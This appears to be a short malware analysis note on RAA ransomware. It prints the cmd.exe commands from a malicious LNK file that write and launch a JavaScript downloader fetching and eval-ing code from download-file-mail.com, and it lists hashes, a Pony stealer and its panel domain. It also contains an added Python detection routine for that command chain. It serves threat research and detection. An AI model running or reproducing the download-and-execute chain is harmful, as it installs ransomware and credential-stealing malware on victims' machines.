Antelox

RAA Ransomware note - 06/20/2016

Jun 20th, 2016
*RAA Ransomware*

Server: download-file-mail.com

From the server an LNK file can be downloaded; it executes the following commands to download and run JavaScript.

LNK commands executed (VT 0/54: https://virustotal.com/en/file/e03b17ee5c7cb5da4e07d3a5b4d84c841b12a89b57f7fb301fac94d014903c57/analysis/):

%windir%\system32\cmd.exe /c cd %TEMP%
echo. 2>s.js
echo var r = new ActiveXObject("Msxml2.ServerXMLHTTP.6.0");r.open("GET","http://download-file-mail.com/src/src",false);r.send^(^);var b = r.responseText;eval^(b^);>s.js
start s.js
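
Detection logic for the command chain above, added here as an example and not part of the original note. It runs over constructed process-creation command lines (the note's own lines plus a benign one); the point it shows is that cmd.exe drops the caret escapes (r.send^(^) runs as r.send()), so a rule must strip carets before matching, or eval^( slips past a naive eval( pattern.

```python
import re

# Constructed sample process-creation command lines, not real telemetry.
SAMPLE_CMDLINES = [
    r'%windir%\system32\cmd.exe /c cd %TEMP%',
    r'cmd.exe /c echo. 2>s.js',
    r'cmd.exe /c echo var r = new ActiveXObject("Msxml2.ServerXMLHTTP.6.0");'
    r'r.open("GET","http://download-file-mail.com/src/src",false);'
    r'r.send^(^);var b = r.responseText;eval^(b^);>s.js',
    r'cmd.exe /c start s.js',
    r'cmd.exe /c echo hello > notes.txt',   # benign, must not trigger
]


def normalize_cmd(cmdline: str) -> str:
    # cmd.exe treats ^ as an escape character and removes it before the
    # command runs, so the script that lands in s.js reads "eval(b);".
    # Strip carets so the obfuscated and plain forms match identically.
    return cmdline.replace("^", "").lower()


def indicators(cmdline: str) -> list[str]:
    # Return the names of the indicators seen in one command line.
    cmd = normalize_cmd(cmdline)
    hits = []
    if re.search(r"echo\b.*>\s*\S+\.js\b", cmd):
        hits.append("echo-to-js")          # script body written via echo redirect
    if "activexobject" in cmd:
        hits.append("activexobject")
    if "serverxmlhttp" in cmd:
        hits.append("serverxmlhttp")       # Msxml2.ServerXMLHTTP downloader
    if re.search(r"\beval\s*\(", cmd):
        hits.append("eval")                # downloaded text fed to eval()
    if re.search(r"\bstart\s+\S+\.js\b", cmd):
        hits.append("start-js")            # the dropped script is launched
    return hits


def detect_chain(cmdlines: list[str]) -> bool:
    # True when a group of command lines (e.g. children of one cmd.exe)
    # both writes a .js via echo with a download/eval payload and starts it.
    seen: set[str] = set()
    for c in cmdlines:
        seen.update(indicators(c))
    wrote_and_ran = {"echo-to-js", "start-js"} <= seen
    return wrote_and_ran and bool({"eval", "activexobject"} & seen)
```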
  13.  
s.js file content (VT 7/55: https://virustotal.com/en/file/ddda0e8dae02ccff662bdbcf87d5b4fdde0f9cb2f27ba922cf5b1d63f6f733c3/analysis/):
https://gist.github.com/Antelox/f9bcb471828d9027b2b8a3c22c8e23b1

Pony malware dropped (VT 13/55):
https://virustotal.com/en/file/3e7950ebc821d0a055c8048baf10a61a667a3f38a94cf65f6b7482650f57087d/analysis/

Pony panel:
fgfhfjfkfl.xyz/admin